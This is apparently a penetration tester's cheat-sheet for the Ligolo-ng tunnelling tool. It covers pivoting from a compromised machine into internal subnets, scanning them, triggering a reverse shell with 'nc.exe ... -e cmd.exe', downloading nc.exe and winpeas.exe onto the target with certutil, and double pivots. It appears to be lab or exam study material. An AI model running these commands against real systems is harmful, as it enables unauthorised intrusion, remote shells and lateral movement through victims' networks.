Ligolo-ng OG

Architecture

Component

Where it runs

proxy

Your Kali (Linux/ARM)

agent / agent.exe

Compromised machine (Windows or Linux)

Method A : Manual Setup (Recommended)

1. Create & Enable TUN Interface on Kali

sudo ip tuntap add user l1nuxkid mode tun ligolo
sudo ip link set ligolo up

2. Start the Proxy on Kali

# Default (port 11601)
./proxy -selfcert
# Custom port
sudo ./proxy -selfcert -laddr 0.0.0.0:25 #well-known port

3. Connect Agent from Pivot Machine

Transfer agent.exe (Windows) or agent (Linux) to the compromised machine, then run:

# Default port
.\agent.exe -connect <KALI_OVPN_IP>:11601 -ignore-cert

# Custom port
.\agent.exe -connect <KALI_OVPN_IP>:25 -ignore-cert

Use your Kali tun0 / OVPN IP — not the VPN gateway.

4. Select Session and Start Tunnel

In the ligolo-ng proxy console (press ENTER after agent connects):

ligolo-ng » session       # list available sessions
ligolo-ng » 1             # select session number
[Agent] » start           # start the tunnel

5. Add Route to Internal Network

First check what subnet to pivot into (run on the pivot machine):

ipconfig    # Windows
ifconfig    # Linux

Then on Kali:

sudo ip route add 10.10.120.0/24 dev ligolo
##sudo ip route add 172.16.237.0/24 dev ligolo
sudo ip route add 240.0.0.1/32 dev ligolo ##access locally running ports
# Verify
ip route list

6. Verify Access

ping -c 1 172.16.237.10
nxc smb 10.10.120.0/24
nmap -sT -p 80,445,3389 10.10.120.0/24

nmap -sT -p- -vvv --min-rate 10000 240.0.0.1 ##local ports exposed too

Method B : Setup via Ligolo Console

Alternative: create the interface and add routes directly from inside the ligolo-ng console, without separate sudo ip commands.

sudo ligolo-proxy -selfcert -laddr 0.0.0.0:9090

After agent connects:

ligolo-ng » session
? Specify a session : 1 - DOMAIN\user@MS01 - 192.168.x.x:PORT

[Agent : DOMAIN\user@MS01] » interface_create --name ligolo
# INFO: Interface created!

[Agent : DOMAIN\user@MS01] » start

[Agent : DOMAIN\user@MS01] » route_add --name ligolo --route 10.10.119.0/24
# INFO: Route created.

Local Port Forwarding — Access Pivot's localhost

Access services bound to 127.0.0.1 on the pivot machine itself (e.g., internal web app not exposed externally).

# Add special loopback route on Kali
sudo ip route add 240.0.0.1/32 dev ligolo

# Now reach the pivot's localhost services via 240.0.0.1
nmap -p- -vvv --min-rate 1000 240.0.0.1
curl http://240.0.0.1:8080

Reverse Shells via Listeners

The deep target can't reach Kali directly. Use listener_add to forward a port on the pivot agent back to your Kali listener.

Step 1 — Add Listener (in ligolo console)

[Agent] » listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444 --tcp
[Agent] » listener_list

Step 2 — Start Listener on Kali

nc -lvnp 4444
penelope -p 4444

Step 3 — Trigger Shell from Target (pointing to Pivot IP)

nc.exe <PIVOT_IP> 1234 -e cmd.exe

File Transfer via Listeners

Step 1 — Add Listener (in ligolo console)

[Agent] » listener_add --addr 0.0.0.0:8080 --to 127.0.0.1:80 --tcp
[Agent] » listener_list

Step 2 — Serve Files on Kali

python3 -m http.server 80

Step 3 — Download on Target (pointing to Pivot IP)

# Windows
certutil -f -urlcache http://<PIVOT_IP>:8080/nc.exe nc.exe
wget http://<PIVOT_IP>:8080/winpeas.exe -OutFile winpeas.exe   # PowerShell

Double Pivot — Chaining

[Kali] ──► [Pivot 1 / Agent 1] ──► [Pivot 2 / Agent 2] ──► [Deep Internal Network]

Step 1 — Forward the Ligolo Port via Listener on Agent 1

[Agent 1] » listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp

Step 2 — Connect Agent 2 Through Pivot 1

# Run on Pivot 2 (pointing to Pivot 1's IP)
.\agent.exe -connect <PIVOT1_IP>:11601 -ignore-cert

Step 3 — Select Agent 2 Session and Add Route

ligolo-ng » session       # now shows both agents
ligolo-ng » 2             # select Agent 2
[Agent 2] » start

# On Kali — add route to the deeper network via ligolo
sudo ip route add 10.10.130.0/24 dev ligolo

Troubleshooting — Crash / File Exists Error

If ligolo-ng crashes and you get RTNETLINK answers: File exists

# Delete all lingering tun interfaces
for d in $(ip tuntap show | awk -F: '/group 0/{gsub(/^[[:space:]]+|[[:space:]]+$/,"",$1); print $1}'); do
  echo "Deleting $d ..."
  sudo ip tuntap del dev "$d" mode tun 2>/dev/null \
    && echo "Deleted $d with ip tuntap" \
    || { sudo ip link delete "$d" 2>/dev/null \
         && echo "Deleted $d with ip link" \
         || echo "Failed to delete $d"; }
done

# Or just delete by name if you know it
sudo ip link delete ligolo

References

Resource

Notes

hideandsec — Pivoting

Highly recommended

ph03n1x — Ligolo Cheatsheet

OffSec mentor resource

verylazytech — Pivoting & Tunneling

Full walkthrough

PreviousWindows Library File Attack NextSQL Injection (SQLi) - Complete Notes

Last updated 1 hour ago

Good morning

hashtagArchitecture

hashtagMethod A : Manual Setup (Recommended)

hashtag1. Create & Enable TUN Interface on Kali

hashtag2. Start the Proxy on Kali

hashtag3. Connect Agent from Pivot Machine

hashtag4. Select Session and Start Tunnel

hashtag5. Add Route to Internal Network

hashtag6. Verify Access

hashtagMethod B : Setup via Ligolo Console

hashtagLocal Port Forwarding — Access Pivot's localhost

hashtagReverse Shells via Listeners

hashtagStep 1 — Add Listener (in ligolo console)

hashtagStep 2 — Start Listener on Kali

hashtagStep 3 — Trigger Shell from Target (pointing to Pivot IP)

hashtagFile Transfer via Listeners

hashtagStep 1 — Add Listener (in ligolo console)

hashtagStep 2 — Serve Files on Kali

hashtagStep 3 — Download on Target (pointing to Pivot IP)

hashtagDouble Pivot — Chaining

hashtagStep 1 — Forward the Ligolo Port via Listener on Agent 1

hashtagStep 2 — Connect Agent 2 Through Pivot 1

hashtagStep 3 — Select Agent 2 Session and Add Route

hashtagTroubleshooting — Crash / File Exists Error

hashtagReferences

Architecture

Method A : Manual Setup (Recommended)

1. Create & Enable TUN Interface on Kali

2. Start the Proxy on Kali

3. Connect Agent from Pivot Machine

4. Select Session and Start Tunnel

5. Add Route to Internal Network

6. Verify Access

Method B : Setup via Ligolo Console

Local Port Forwarding — Access Pivot's localhost

Reverse Shells via Listeners

Step 1 — Add Listener (in ligolo console)

Step 2 — Start Listener on Kali

Step 3 — Trigger Shell from Target (pointing to Pivot IP)

File Transfer via Listeners

Step 1 — Add Listener (in ligolo console)

Step 2 — Serve Files on Kali

Step 3 — Download on Target (pointing to Pivot IP)

Double Pivot — Chaining

Step 1 — Forward the Ligolo Port via Listener on Agent 1

Step 2 — Connect Agent 2 Through Pivot 1

Step 3 — Select Agent 2 Session and Add Route

Troubleshooting — Crash / File Exists Error

References